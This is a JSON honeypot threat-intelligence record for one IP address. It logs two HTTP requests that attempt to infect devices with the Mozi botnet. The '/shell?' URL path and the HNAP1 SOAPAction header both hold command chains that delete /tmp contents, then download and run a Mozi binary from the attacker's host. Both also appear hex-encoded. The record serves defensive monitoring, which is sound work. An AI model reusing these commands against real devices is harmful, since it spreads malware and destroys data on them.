{"ip":"36.255.40.171","total_events":2,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":"nsp"},"first_seen":"2026-05-12T12:06:09","last_seen":"2026-06-26T13:35:43","events_24h":0,"events_7d":1,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Sindh","city":"Karachi","lat":24.8591,"lon":66.9983,"asn":9541,"org":"Cyber Internet Services (Pvt) Ltd."},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as9541","label":"Cyber Internet Services","category":"isp","url":"https://www.peeringdb.com/asn/9541"},"cve_matches":[],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":2}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["ge11nn0400_1830ad44f9e1","po10nn0400_431d19378e9e"]},"fingerprint_peers":{"ge11nn0400_1830ad44f9e1":26,"po10nn0400_431d19378e9e":20},"user_agents":["Hello, world"],"timeline":[{"date":"2026-05-12","count":1},{"date":"2026-06-26","count":1}],"recent_events":[{"timestamp":"2026-06-26T13:35:43","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\"connection\":\"keep-alive\",\"host\":\"<HONEYPOT>:80\",\"user-agent\":\"Hello, world\"}","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/shell?cd+/tmp;rm+-rf+*;wget+http://36.255.40.171:34374/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","summary":"","payload_hex":"474554202f7368656c6c3f63642b2f746d703b726d2b2d72662b2a3b776765742b687474703a2f2f33362e3235352e34302e3137313a33343337342f4d6f7a692e613b63686d6f642b3737372b4d6f7a692e613b2f746d702f4d6f7a692e612b6a61777320485454502f312e310d0a557365722d4167656e743a2048656c6c6f2c20776f726c640d0a486f73743a20<HONEYPOT>3a38300d0a4163636570743a20746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e380d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a0d0a","method":"GET","user_agent":"Hello, world","community_id":"1:YbNNI2epMQwVmWSSDt7QGqrjQ4c=","ja3":"","session":"c58fbbbd-9bad-4e5f-90aa-c2074a2e7aa6","seq":1,"duration_ms":100,"bytes_in":271,"bytes_out":78},{"timestamp":"2026-05-12T12:06:09","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"content-length\":\"640\",\"content-type\":\"text/xml; charset=\\\"utf-8\\\"\",\"host\":\"<HONEYPOT>:80\",\"soapaction\":\"http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://36.255.40.171:48447/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\"}","body":"<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/HNAP1/","summary":"","payload_hex":"504f5354202f484e4150312f20485454502f312e300d0a486f73743a20<HONEYPOT>3a38300d0a436f6e74656e742d547970653a20746578742f786d6c3b20636861727365743d227574662d38220d0a534f4150416374696f6e3a20687474703a2f2f707572656e6574776f726b732e636f6d2f484e4150312f606364202f746d7020262620726d202d7266202a202626207767657420687474703a2f2f33362e3235352e34302e3137313a34383434372f4d6f7a692e6d2026262063686d6f6420373737202f746d702f4d6f7a692e6d202626202f746d702f4d6f7a692e6d600d0a436f6e74656e742d4c656e6774683a203634300d0a0d0a3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d227574662d38223f3e3c736f61703a456e76656c6f706520786d6c6e733a7873693d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612d696e7374616e63652220786d6c6e733a7873643d22687474703a2f2f7777772e77332e6f72672f323030312f584d4c536368656d612220786d6c6e733a736f61703d22687474703a2f2f736368656d61732e786d6c736f61702e6f72672f736f61702f656e76656c6f70652f223e3c736f61703a426f64793e3c416464506f72744d617070696e6720786d6c6e733d22687474703a2f2f707572656e6574776f726b732e636f6d2f484e4150312f223e3c506f72744d617070696e674465736372697074696f6e3e666f6f6261723c2f506f72744d617070696e674465736372697074696f6e3e3c496e7465726e616c436c69656e743e3139322e3136382e302e3130303c2f496e7465726e616c436c69656e743e3c506f72744d617070696e6750726f746f636f6c3e5443503c2f506f72744d617070696e6750726f746f636f6c3e3c45787465726e616c506f72743e313233343c2f45787465726e616c506f72743e3c496e7465726e616c506f72743e313233343c2f496e7465726e616c506f72743e3c2f416464506f72744d617070696e673e3c2f736f61703a426f64793e3c2f736f61703a456e76656c6f70653e0d0a0d0a","method":"POST","user_agent":"","community_id":"1:uxmQW9EbMnI72M9+mbJOMQ7zRW8=","ja3":"","session":"222bd62f-7064-4388-bd05-1e72357a3e5c","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"GET","count":1},{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/HNAP1/","count":1,"ports":1},{"path":"/shell?cd+/tmp;rm+-rf+*;wget+http://36.255.40.171:34374/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","count":1,"ports":1}],"distinct_paths_total":2,"top_snis":[],"top_hosts":[],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Connection","Host","User-Agent"],"representative":[{"name":"Accept","value":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Host","value":"<HONEYPOT>:80","notable":false},{"name":"User-Agent","value":"Hello, world","notable":false}],"distinct_sets":2,"events_with_headers":2},"tags":[],"data_as_of":"2026-06-28T03:47:59.787025+00:00"}